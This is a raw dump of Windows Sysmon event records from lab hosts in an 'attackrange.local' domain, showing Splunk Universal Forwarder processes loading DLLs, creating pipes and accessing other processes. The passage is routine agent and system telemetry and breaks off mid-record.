WindowsValid 734700x800000000000000057346287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057346286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057346285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057346283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057346280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057346279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057346278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057346277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057346275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057346273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057346272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057346271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057346270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057346269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057346267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x800000000000000057346266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057346265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057346262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057346261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x800000000000000057346260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.643{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.643{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057346258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.644{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057346257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.643{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:11.643{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.643{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:11.643{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.643{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:11.643{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057346251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.427{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.427{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD4FA8807897288D578EC4A5674A8A79,SHA256=0A3A91F308710F71F665D14BE1F96D66E85F377FEE55449D18F0F8E35509F06Ffalsetrue 10341000x800000000000000021219783Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.268{AD5E2759-5B83-618E-14CE-08000000F101}55484772C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219782Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.127{AD5E2759-54C7-6143-A600-00000000F101}4072NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219781Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.096{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B83-618E-14CE-08000000F101}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219780Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.096{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219779Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.096{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219778Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.096{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219777Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.096{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219776Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.096{AD5E2759-5432-6143-0500-00000000F101}4122832C:\Windows\system32\csrss.exe{AD5E2759-5B83-618E-14CE-08000000F101}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219775Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.096{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B83-618E-14CE-08000000F101}5548C:\Program 